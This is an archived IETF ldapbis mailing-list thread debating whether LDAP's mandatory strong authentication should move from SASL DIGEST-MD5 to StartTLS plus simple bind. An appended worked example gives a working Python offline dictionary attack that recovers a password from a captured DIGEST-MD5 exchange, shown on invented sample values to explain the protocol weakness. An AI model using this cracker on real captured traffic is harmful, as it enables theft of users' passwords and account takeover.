Re: authmeth-15: mandatory-to-implement strong authentication (ietf.ldapbis, msg#00024)
It's my personal opinion that the mandatory-to-implement "strong" authentication mechanism must provide adequate protection against hijack attacks. That is, it must provide a data integrity service. It's also my personal opinion that adequate interoperability between LDAP clients and servers using DIGEST-MD5 security layers does not exist. It is also my understanding that the DIGEST-MD5 specification is undergoing significant redesign (requiring implementation changes).

I agree with Mark that adequate interoperability does exist between LDAP clients using Start TLS and simple bind. It is my understanding that the revised TLS specification is readily movable to Draft Standard status (that is, it will move faster than the revised LDAP TS).

Hence, I support changing LDAP's mandatory-to-implement "strong" authentication mechanism to be StartTLS+simple.

I recommend that we remove all DIGEST-MD5 requirements from authmeth (and the LDAP TS) such that the normative reference to the DIGEST-MD5 specification can be removed. While it might be desirable to RECOMMEND implementations support DIGEST-MD5, I would rather word this in a manner that doesn't require a normative reference to DIGEST-MD5. For instance:

    In the Changes:
    Changed LDAP's mandatory-to-implement "strong" authentication
    mechanism from SASL/DIGEST-MD5 to StartTLS+simple (as discussed in
    Section X.Y). Implementors are encouraged to continue supporting
    SASL/DIGEST-MD5 [DIGEST-MD5].

Kurt

At 04:41 PM 9/22/2005, Mark Ennis wrote:
>Roger,
>
>I get the impression from this message that the SASL DIGEST-MD5 security layers are being proposed as mandatory to implement in authmeth. It was my understanding that only the SASL DIGEST-MD5 authentication mechanism was to be mandatory to implement. If we are going to require a mandatory to implement security layer in authmeth then I think it should be startTLS not SASL DIGEST-MD5 as, in my experience, startTLS is far more common in both client and server implementations. Then, if we have a mandatory to implement security layer, it removes the need for a challenge response authentication method being mandatory to implement as the IESG security requirements are met by simple authentication over TLS.
>
>- Mark.
>
>Roger Harrison wrote:
>>
>>There was considerable discussion at the IETF 63 meeting regarding recent research into challenge-response protocols (such as DIGEST-MD5) being vulnerable to off-line dictionary attacks (see http://www3.ietf.org/proceedings/05aug/minutes/sasl.html and http://www3.ietf.org/proceedings/05aug/slides/apparea-4/sld1.htm ). One proposal was to recommend performing challenge-response authentication over TLS-protected connections. If we moved in this direction, then requiring the use of DIGEST-MD5 security layers seems redundant.
>>
>>What effect, if any, does this have on our use of DIGEST-MD5 as the mandatory-to-implement strong authentication mechanism for LDAP?
>>
>>Roger
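The off-line dictionary attack Roger refers to, shown as an added worked example that is not part of the thread and not code from any LDAP implementation: a single passively captured DIGEST-MD5 exchange contains everything needed to recompute the client's `response` for a password guess, so guesses are checked locally and the server is never contacted again. The server challenge, client nonce, username, password and wordlist are constructed values; `parse_directives`, `digest_md5_response`, `build_client_response` and `offline_dictionary_attack` are this example's own names. The response computation follows RFC 2831 section 2.1.2.1 (qop=auth, no authzid in the sample).

```python
"""Offline dictionary attack against a captured SASL DIGEST-MD5 exchange.

Added illustration for the thread above; not code from the thread or from
any LDAP implementation.  The server challenge, client nonce, username and
password below are constructed sample values.  The response is computed as
RFC 2831 specifies, so a single passively captured exchange is enough to
verify password guesses without any further contact with the server.
"""
import hashlib
from typing import Dict, Iterable, Optional


def _h(data: bytes) -> bytes:
    """H(): raw 16-byte MD5 digest."""
    return hashlib.md5(data).digest()


def _hh(data: bytes) -> str:
    """HEX(H()): lowercase hex MD5 digest."""
    return hashlib.md5(data).hexdigest()


def parse_directives(msg: str) -> Dict[str, str]:
    """Parse the comma-separated key=value / key="value" list used by DIGEST-MD5.

    Commas inside quoted values (e.g. qop="auth,auth-int") do not split.
    """
    out: Dict[str, str] = {}
    key, val, in_val, quoted = [], [], False, False
    for ch in msg:
        if not in_val:
            if ch == "=":
                in_val = True
            else:
                key.append(ch)
        elif ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            out["".join(key).strip()] = "".join(val)
            key, val, in_val = [], [], False
        else:
            val.append(ch)
    if key:
        out["".join(key).strip()] = "".join(val)
    return out


def digest_md5_response(username: str, realm: str, password: str, nonce: str,
                        cnonce: str, nc: str, qop: str, digest_uri: str,
                        authzid: Optional[str] = None) -> str:
    """Compute the DIGEST-MD5 'response' directive (RFC 2831, section 2.1.2.1)."""
    # A1 = { H(username:realm:password), ":", nonce, ":", cnonce [, ":", authzid] }
    a1 = _h(f"{username}:{realm}:{password}".encode("utf-8"))
    a1 += f":{nonce}:{cnonce}".encode("utf-8")
    if authzid:
        a1 += f":{authzid}".encode("utf-8")
    # A2 = "AUTHENTICATE:" digest-uri [":" 32 zeros for auth-int / auth-conf]
    a2 = f"AUTHENTICATE:{digest_uri}"
    if qop in ("auth-int", "auth-conf"):
        a2 += ":" + "0" * 32
    # response = HEX(KD(HEX(H(A1)), nonce:nc:cnonce:qop:HEX(H(A2)))), KD(k, s) = H(k:s)
    kd_input = f"{_hh(a1)}:{nonce}:{nc}:{cnonce}:{qop}:{_hh(a2.encode('utf-8'))}"
    return _hh(kd_input.encode("utf-8"))


def build_client_response(challenge: str, username: str, password: str,
                          cnonce: str, digest_uri: str) -> str:
    """What a client sends back for the given server challenge (qop=auth, nc=1)."""
    ch = parse_directives(challenge)
    nc, qop = "00000001", "auth"
    resp = digest_md5_response(username, ch["realm"], password, ch["nonce"],
                               cnonce, nc, qop, digest_uri)
    return (f'charset=utf-8,username="{username}",realm="{ch["realm"]}",'
            f'nonce="{ch["nonce"]}",nc={nc},cnonce="{cnonce}",'
            f'digest-uri="{digest_uri}",response={resp},qop={qop}')


def offline_dictionary_attack(client_response: str,
                              wordlist: Iterable[str]) -> Optional[str]:
    """Recover the password from a captured client response, given a wordlist.

    Everything needed to recompute 'response' for a guess (username, realm,
    nonce, cnonce, nc, qop, digest-uri) is in the client's message in clear,
    so each guess is checked locally; the server is never contacted.
    """
    rs = parse_directives(client_response)
    for guess in wordlist:
        if digest_md5_response(rs["username"], rs["realm"], guess, rs["nonce"],
                               rs["cnonce"], rs["nc"], rs["qop"], rs["digest-uri"],
                               rs.get("authzid")) == rs["response"]:
            return guess
    return None


# Constructed sample exchange (all values invented for this example).
SERVER_CHALLENGE = ('realm="example.com",nonce="c2VydmVybm9uY2UxMjM0",'
                    'qop="auth",charset=utf-8,algorithm=md5-sess')
CLIENT_RESPONSE = build_client_response(SERVER_CHALLENGE, "alice", "hunter2",
                                        "Y2xpZW50bm9uY2U5OTk=", "ldap/ldap.example.com")
WORDLIST = ["password", "123456", "letmein", "hunter2", "qwerty"]

if __name__ == "__main__":
    print("S:", SERVER_CHALLENGE)
    print("C:", CLIENT_RESPONSE)
    print("recovered password:", offline_dictionary_attack(CLIENT_RESPONSE, WORDLIST))
```

The attacker's cost per guess is two MD5 computations, and nothing rate-limits it, which is why the strength of the password alone decides the outcome. Running the same exchange inside a TLS session (the IETF 63 proposal Roger mentions), or replacing it with simple bind over StartTLS as Kurt proposes, leaves a passive observer with ciphertext only, so the guess-verification oracle disappears; the remaining exposure is then the server's view of the cleartext password and the client's certificate validation. Implementations of the response computation can be checked against the worked example in RFC 2831 section 4.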